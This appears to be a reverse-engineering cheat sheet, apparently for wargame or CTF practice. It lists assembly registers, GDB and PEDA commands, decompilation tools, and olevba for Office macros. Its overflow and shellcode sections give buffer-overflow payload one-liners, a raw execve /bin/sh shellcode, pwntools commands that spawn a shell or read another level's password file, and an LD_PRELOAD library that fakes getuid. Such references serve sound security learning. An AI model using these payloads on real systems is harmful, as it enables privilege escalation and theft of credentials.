HackSheet

---

• ASM
• Binary ninja
• Decompile Python Executable
• GDB
• Lib Injection
• Macro Office PPTM
• OverFlow
• Shellcode

ASM

Variables

| x64 | x32 | What is ? | |:——-:|:———:|————————-| | RAX | EAX | Return Value | | RCX | ECX | Counter (or Fourth Arg) | | RDX | EDX | Third Arg | | RSI | ESI | Second Arg | | RDI | EDI | First Arg of Function | | RSP | ESP | Stack Pointer | | RIP | EIP | Next Instruction | | R8-R11 | r8d-r11d | Scratch register | | R12-R15 | r12d-r15d | Preserved register |

Source

Operation

| Operation | Explication | |:———————-|————————-| | MOV size dest,src | dest ← src | | LEA dest,[op] | dest ← addr op | | PUSH op | Increase RSP & Store op | | POP op | Load op & Discrease RSP | | | | | ADD op1,op2 | op1 ← op1 + op2 | | SUB op1,op2 | op1 ← op1 - op2 | | NEG reg | reg ← -reg | | INC reg | reg ← reg + 1 | | DEC reg | reg ← reg - 1 | | | | | AND op1,op2 | op1 ← op1 & op2 | | OR op1,op2 | op1 ← op1 | op2 | | XOR op1,op2 | op1 ← op1 ^ op2 | | | | | CMP op1,op2 | op1 - op2 | | TEST op1,op2 | op1 & op2 | | JMP op | Jump to op |

Source - Page 21

Overflow

Basic

(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")

Shellcode

(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")

Shellcode

Cat

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"

Exec sh 1

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"

Exec sh 2

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21

GDB

Command

b *0x12345678      # Breakpoint
b strcpy           # Breakpoint
r                  # Run program
r < <(echo lol)    # Run with pipe
r arg1 arg2        # Run with arg
c                  # Continue
n                  # Next operation
set $eax=0x00      # Set variable
info register      # Show Register

Print

x/s "string"
x/d 53
x/x 0xff
help x

print $rax

• Gdb cheatsheet - gabriellesc
• Gdb cheatsheet - darkdust

Get env address

x/10s **(char***)&environ

Peda

Install

git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Binary ninja

Scrap code from html

let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
  [...parent_elmt.children].forEach(children_elmt => {
    result += children_elmt.textContent
  });
  result +=  '\n'
});
console.log(result);

Lib Injection

• Recreate getuid function

  uid_t	getuid(void)
  {
    return (4242);
  }
  

• compile

  gcc -shared -fpic lib.c -o libnike.so -m32
  

• run and inject

  LD_PRELOAD=./libnike.so ./exec
  

Decompile Python Executable

Convert executable into .pyc

git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec

Disassembly .pyc (compatible python 3.9.2)

git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly

Macro Office PPTM

Install

sudo pip3 install oletools

Decompress PPTM

olevba  -c file.pptm

• ViperMonkey

This site is open source. Improve this page.